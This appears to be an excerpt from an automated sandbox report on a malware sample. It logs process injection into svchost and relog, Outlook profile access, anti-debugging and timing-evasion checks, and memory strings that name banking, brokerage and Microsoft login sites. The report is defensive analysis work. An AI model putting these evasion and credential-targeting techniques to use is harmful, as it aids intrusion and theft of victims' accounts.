Source: C:\Program Files (x86)\fZntWIwPsvXltFXeGadUlvMRdPOdaWZtaZLBrrFdufYUijSKGLHiGSUyPjh\fIydfvfomIEE.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\fZntWIwPsvXltFXeGadUlvMRdPOdaWZtaZLBrrFdufYUijSKGLHiGSUyPjh\fIydfvfomIEE.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\fZntWIwPsvXltFXeGadUlvMRdPOdaWZtaZLBrrFdufYUijSKGLHiGSUyPjh\fIydfvfomIEE.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\relog.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\relog.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: XeFYBYYj0w.exe

Static file information: File size 1294848 > 1048576

Source: XeFYBYYj0w.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: XeFYBYYj0w.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: XeFYBYYj0w.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: XeFYBYYj0w.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: XeFYBYYj0w.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: XeFYBYYj0w.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: XeFYBYYj0w.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: relog.pdbGCTL source: svchost.exe, 00000003.00000003.1606578392.0000000002C2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1606526626.0000000002C13000.00000004.00000020.00020000.00000000.sdmp, fIydfvfomIEE.exe, 00000005.00000003.1830165440.00000000012BB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: relog.pdb source: svchost.exe, 00000003.00000003.1606578392.0000000002C2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1606526626.0000000002C13000.00000004.00000020.00020000.00000000.sdmp, fIydfvfomIEE.exe, 00000005.00000003.1830165440.00000000012BB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: fIydfvfomIEE.exe, 00000005.00000000.1563585408.000000000056E000.00000002.00000001.01000000.00000005.sdmp, fIydfvfomIEE.exe, 00000007.00000002.3145062367.000000000056E000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: XeFYBYYj0w.exe, 00000000.00000003.1331043046.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, XeFYBYYj0w.exe, 00000000.00000003.1331319141.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1549241251.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1639720900.0000000003300000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1639720900.000000000349E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1551043367.0000000003100000.00000004.00000020.00020000.00000000.sdmp, relog.exe, 00000006.00000003.1641805167.0000000002B20000.00000004.00000020.00020000.00000000.sdmp, relog.exe, 00000006.00000002.3146904584.0000000002CD0000.00000040.00001000.00020000.00000000.sdmp, relog.exe, 00000006.00000003.1639382419.0000000002978000.00000004.00000020.00020000.00000000.sdmp, relog.exe, 00000006.00000002.3146904584.0000000002E6E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: XeFYBYYj0w.exe, 00000000.00000003.1331043046.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, XeFYBYYj0w.exe, 00000000.00000003.1331319141.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000003.00000003.1549241251.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1639720900.0000000003300000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1639720900.000000000349E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1551043367.0000000003100000.00000004.00000020.00020000.00000000.sdmp, relog.exe, relog.exe, 00000006.00000003.1641805167.0000000002B20000.00000004.00000020.00020000.00000000.sdmp, relog.exe, 00000006.00000002.3146904584.0000000002CD0000.00000040.00001000.00020000.00000000.sdmp, relog.exe, 00000006.00000003.1639382419.0000000002978000.00000004.00000020.00020000.00000000.sdmp, relog.exe, 00000006.00000002.3146904584.0000000002E6E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: relog.exe, 00000006.00000002.3145583300.0000000002881000.00000004.00000020.00020000.00000000.sdmp, relog.exe, 00000006.00000002.3147754299.00000000032FC000.00000004.10000000.00040000.00000000.sdmp, fIydfvfomIEE.exe, 00000007.00000000.1710941442.00000000034BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.1937368807.000000002ED0C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: relog.exe, 00000006.00000002.3145583300.0000000002881000.00000004.00000020.00020000.00000000.sdmp, relog.exe, 00000006.00000002.3147754299.00000000032FC000.00000004.10000000.00040000.00000000.sdmp, fIydfvfomIEE.exe, 00000007.00000000.1710941442.00000000034BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.1937368807.000000002ED0C000.00000004.80000000.00040000.00000000.sdmp

Source: XeFYBYYj0w.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: XeFYBYYj0w.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: XeFYBYYj0w.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: XeFYBYYj0w.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: XeFYBYYj0w.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\XeFYBYYj0w.exe

Code function: 0_2_00A14B37 LoadLibraryA,GetProcAddress,

0_2_00A14B37

Source: C:\Users\user\Desktop\XeFYBYYj0w.exe	Code function: 0_2_00A38945 push ecx; ret	0_2_00A38958
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_00403280 push eax; ret	3_2_00403282
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_00414323 push cs; retf	3_2_0041436D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_00417BE2 push edi; iretd	3_2_00417BEC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_00417C30 push esi; ret	3_2_00417C32
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0040D5CD push es; ret	3_2_0040D5D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_00417DF9 push FFFFFF83h; retf	3_2_00417E04
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_00401753 push edi; retf	3_2_00401754
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0330225F pushad ; ret	3_2_033027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033027FA pushad ; ret	3_2_033027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033309AD push ecx; mov dword ptr [esp], ecx	3_2_033309B6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0330283D push eax; iretd	3_2_03302858
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02D009AD push ecx; mov dword ptr [esp], ecx	6_2_02D009B6
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_004B0267 push esp; ret	6_2_004B026A
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_004A495F push edi; iretd	6_2_004A4969
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_004A49AD push esi; ret	6_2_004A49AF
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_004A4B76 push FFFFFF83h; retf	6_2_004A4B81
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_0049DEE9 push ecx; retf	6_2_0049DEF6
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02B2511D push 00000036h; iretd	6_2_02B25127
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02B257F4 push es; iretd	6_2_02B25802
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02B25701 push esp; ret	6_2_02B25702
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02B2577A push es; iretd	6_2_02B25802
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02B25FB6 push cs; retf	6_2_02B25FB7
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02B2BFF6 push ss; ret	6_2_02B2C00B
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02B2EF1D push ds; ret	6_2_02B2EF1F
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02B29F7E pushfd ; retf	6_2_02B29F87
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02B2BCFA push edi; retf	6_2_02B2BD08
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02B23D7B push 9BC5D6BBh; ret	6_2_02B23D80

Source: C:\Users\user\Desktop\XeFYBYYj0w.exe	Code function: 0_2_00A148D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_00A148D7
Source: C:\Users\user\Desktop\XeFYBYYj0w.exe	Code function: 0_2_00A95376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_00A95376

Source: C:\Users\user\Desktop\XeFYBYYj0w.exe

Code function: 0_2_00A33187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00A33187

Source: C:\Users\user\Desktop\XeFYBYYj0w.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XeFYBYYj0w.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\XeFYBYYj0w.exe	API/Special instruction interceptor: Address: 114C164
Source: C:\Windows\SysWOW64\relog.exe	API/Special instruction interceptor: Address: 7FFB2CECD324
Source: C:\Windows\SysWOW64\relog.exe	API/Special instruction interceptor: Address: 7FFB2CECD7E4
Source: C:\Windows\SysWOW64\relog.exe	API/Special instruction interceptor: Address: 7FFB2CECD944
Source: C:\Windows\SysWOW64\relog.exe	API/Special instruction interceptor: Address: 7FFB2CECD504
Source: C:\Windows\SysWOW64\relog.exe	API/Special instruction interceptor: Address: 7FFB2CECD544
Source: C:\Windows\SysWOW64\relog.exe	API/Special instruction interceptor: Address: 7FFB2CECD1E4
Source: C:\Windows\SysWOW64\relog.exe	API/Special instruction interceptor: Address: 7FFB2CED0154
Source: C:\Windows\SysWOW64\relog.exe	API/Special instruction interceptor: Address: 7FFB2CECDA44

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 3_2_0337096E rdtsc

3_2_0337096E

Source: C:\Users\user\Desktop\XeFYBYYj0w.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_0-105505

Source: C:\Users\user\Desktop\XeFYBYYj0w.exe	API coverage: 4.6 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\relog.exe	API coverage: 2.7 %

Source: C:\Windows\SysWOW64\relog.exe TID: 1876	Thread sleep count: 41 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe TID: 1876	Thread sleep time: -82000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\fZntWIwPsvXltFXeGadUlvMRdPOdaWZtaZLBrrFdufYUijSKGLHiGSUyPjh\fIydfvfomIEE.exe TID: 1180	Thread sleep time: -55000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\fZntWIwPsvXltFXeGadUlvMRdPOdaWZtaZLBrrFdufYUijSKGLHiGSUyPjh\fIydfvfomIEE.exe TID: 1180	Thread sleep time: -36000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\relog.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\relog.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\XeFYBYYj0w.exe	Code function: 0_2_00A7445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00A7445A
Source: C:\Users\user\Desktop\XeFYBYYj0w.exe	Code function: 0_2_00A7C6D1 FindFirstFileW,FindClose,	0_2_00A7C6D1
Source: C:\Users\user\Desktop\XeFYBYYj0w.exe	Code function: 0_2_00A7C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_00A7C75C
Source: C:\Users\user\Desktop\XeFYBYYj0w.exe	Code function: 0_2_00A7EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00A7EF95
Source: C:\Users\user\Desktop\XeFYBYYj0w.exe	Code function: 0_2_00A7F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00A7F0F2
Source: C:\Users\user\Desktop\XeFYBYYj0w.exe	Code function: 0_2_00A7F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00A7F3F3
Source: C:\Users\user\Desktop\XeFYBYYj0w.exe	Code function: 0_2_00A737EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00A737EF
Source: C:\Users\user\Desktop\XeFYBYYj0w.exe	Code function: 0_2_00A73B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00A73B12
Source: C:\Users\user\Desktop\XeFYBYYj0w.exe	Code function: 0_2_00A7BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00A7BCBC
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_004AC330 FindFirstFileW,FindNextFileW,FindClose,	6_2_004AC330

Source: C:\Users\user\Desktop\XeFYBYYj0w.exe

Code function: 0_2_00A149A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00A149A0

Source: 18155I0h.6.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: 18155I0h.6.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: 18155I0h.6.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: 18155I0h.6.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: 18155I0h.6.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: 18155I0h.6.dr	Binary or memory string: outlook.office.comVMware20,11696492231s
Source: fIydfvfomIEE.exe, 00000007.00000002.3146584133.000000000164F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllQ
Source: 18155I0h.6.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: 18155I0h.6.dr	Binary or memory string: AMC password management pageVMware20,11696492231
Source: 18155I0h.6.dr	Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: 18155I0h.6.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: 18155I0h.6.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: 18155I0h.6.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: 18155I0h.6.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: 18155I0h.6.dr	Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: 18155I0h.6.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: 18155I0h.6.dr	Binary or memory string: discord.comVMware20,11696492231f
Source: relog.exe, 00000006.00000002.3145583300.0000000002881000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000009.00000002.1938712469.000002586ECFC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 18155I0h.6.dr	Binary or memory string: global block list test formVMware20,11696492231
Source: 18155I0h.6.dr	Binary or memory string: dev.azure.comVMware20,11696492231j
Source: 18155I0h.6.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: 18155I0h.6.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: 18155I0h.6.dr	Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: 18155I0h.6.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: 18155I0h.6.dr	Binary or memory string: tasks.office.comVMware20,11696492231o
Source: 18155I0h.6.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: 18155I0h.6.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: 18155I0h.6.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: 18155I0h.6.dr	Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: 18155I0h.6.dr	Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: 18155I0h.6.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696492231\|UE
Source: 18155I0h.6.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: 18155I0h.6.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696492231]

Source: C:\Users\user\Desktop\XeFYBYYj0w.exe

API call chain: ExitProcess graph end node

graph_0-104350

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 3_2_0337096E rdtsc

3_2_0337096E

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 3_2_00417523 LdrLoadDll,

3_2_00417523

Source: C:\Users\user\Desktop\XeFYBYYj0w.exe

Code function: 0_2_00A83F09 BlockInput,

0_2_00A83F09

Source: C:\Users\user\Desktop\XeFYBYYj0w.exe

Code function: 0_2_00A13B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00A13B3A

Source: C:\Users\user\Desktop\XeFYBYYj0w.exe

Code function: 0_2_00A45A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_00A45A7C

Source: C:\Users\user\Desktop\XeFYBYYj0w.exe

Code function: 0_2_00A14B37 LoadLibraryA,GetProcAddress,

0_2_00A14B37

Source: C:\Users\user\Desktop\XeFYBYYj0w.exe	Code function: 0_2_0114C3D0 mov eax, dword ptr fs:[00000030h]	0_2_0114C3D0
Source: C:\Users\user\Desktop\XeFYBYYj0w.exe	Code function: 0_2_0114C430 mov eax, dword ptr fs:[00000030h]	0_2_0114C430
Source: C:\Users\user\Desktop\XeFYBYYj0w.exe	Code function: 0_2_0114ADA0 mov eax, dword ptr fs:[00000030h]	0_2_0114ADA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0332C310 mov ecx, dword ptr fs:[00000030h]	3_2_0332C310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03350310 mov ecx, dword ptr fs:[00000030h]	3_2_03350310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0336A30B mov eax, dword ptr fs:[00000030h]	3_2_0336A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0336A30B mov eax, dword ptr fs:[00000030h]	3_2_0336A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0336A30B mov eax, dword ptr fs:[00000030h]	3_2_0336A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033D437C mov eax, dword ptr fs:[00000030h]	3_2_033D437C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033B035C mov eax, dword ptr fs:[00000030h]	3_2_033B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033B035C mov eax, dword ptr fs:[00000030h]	3_2_033B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033B035C mov eax, dword ptr fs:[00000030h]	3_2_033B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033B035C mov ecx, dword ptr fs:[00000030h]	3_2_033B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033B035C mov eax, dword ptr fs:[00000030h]	3_2_033B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033B035C mov eax, dword ptr fs:[00000030h]	3_2_033B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033FA352 mov eax, dword ptr fs:[00000030h]	3_2_033FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033D8350 mov ecx, dword ptr fs:[00000030h]	3_2_033D8350
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033B2349 mov eax, dword ptr fs:[00000030h]	3_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033B2349 mov eax, dword ptr fs:[00000030h]	3_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033B2349 mov eax, dword ptr fs:[00000030h]	3_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033B2349 mov eax, dword ptr fs:[00000030h]	3_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033B2349 mov eax, dword ptr fs:[00000030h]	3_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033B2349 mov eax, dword ptr fs:[00000030h]	3_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033B2349 mov eax, dword ptr fs:[00000030h]	3_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033B2349 mov eax, dword ptr fs:[00000030h]	3_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033B2349 mov eax, dword ptr fs:[00000030h]	3_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033B2349 mov eax, dword ptr fs:[00000030h]	3_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033B2349 mov eax, dword ptr fs:[00000030h]	3_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033B2349 mov eax, dword ptr fs:[00000030h]	3_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033B2349 mov eax, dword ptr fs:[00000030h]	3_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033B2349 mov eax, dword ptr fs:[00000030h]	3_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033B2349 mov eax, dword ptr fs:[00000030h]	3_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03328397 mov eax, dword ptr fs:[00000030h]	3_2_03328397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03328397 mov eax, dword ptr fs:[00000030h]	3_2_03328397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03328397 mov eax, dword ptr fs:[00000030h]	3_2_03328397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0332E388 mov eax, dword ptr fs:[00000030h]	3_2_0332E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0332E388 mov eax, dword ptr fs:[00000030h]	3_2_0332E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0332E388 mov eax, dword ptr fs:[00000030h]	3_2_0332E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0335438F mov eax, dword ptr fs:[00000030h]	3_2_0335438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0335438F mov eax, dword ptr fs:[00000030h]	3_2_0335438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0334E3F0 mov eax, dword ptr fs:[00000030h]	3_2_0334E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0334E3F0 mov eax, dword ptr fs:[00000030h]	3_2_0334E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0334E3F0 mov eax, dword ptr fs:[00000030h]	3_2_0334E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033663FF mov eax, dword ptr fs:[00000030h]	3_2_033663FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033403E9 mov eax, dword ptr fs:[00000030h]	3_2_033403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033403E9 mov eax, dword ptr fs:[00000030h]	3_2_033403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033403E9 mov eax, dword ptr fs:[00000030h]	3_2_033403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033403E9 mov eax, dword ptr fs:[00000030h]	3_2_033403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033403E9 mov eax, dword ptr fs:[00000030h]	3_2_033403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033403E9 mov eax, dword ptr fs:[00000030h]	3_2_033403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033403E9 mov eax, dword ptr fs:[00000030h]	3_2_033403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033403E9 mov eax, dword ptr fs:[00000030h]	3_2_033403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033DE3DB mov eax, dword ptr fs:[00000030h]	3_2_033DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033DE3DB mov eax, dword ptr fs:[00000030h]	3_2_033DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033DE3DB mov ecx, dword ptr fs:[00000030h]	3_2_033DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033DE3DB mov eax, dword ptr fs:[00000030h]	3_2_033DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033D43D4 mov eax, dword ptr fs:[00000030h]	3_2_033D43D4
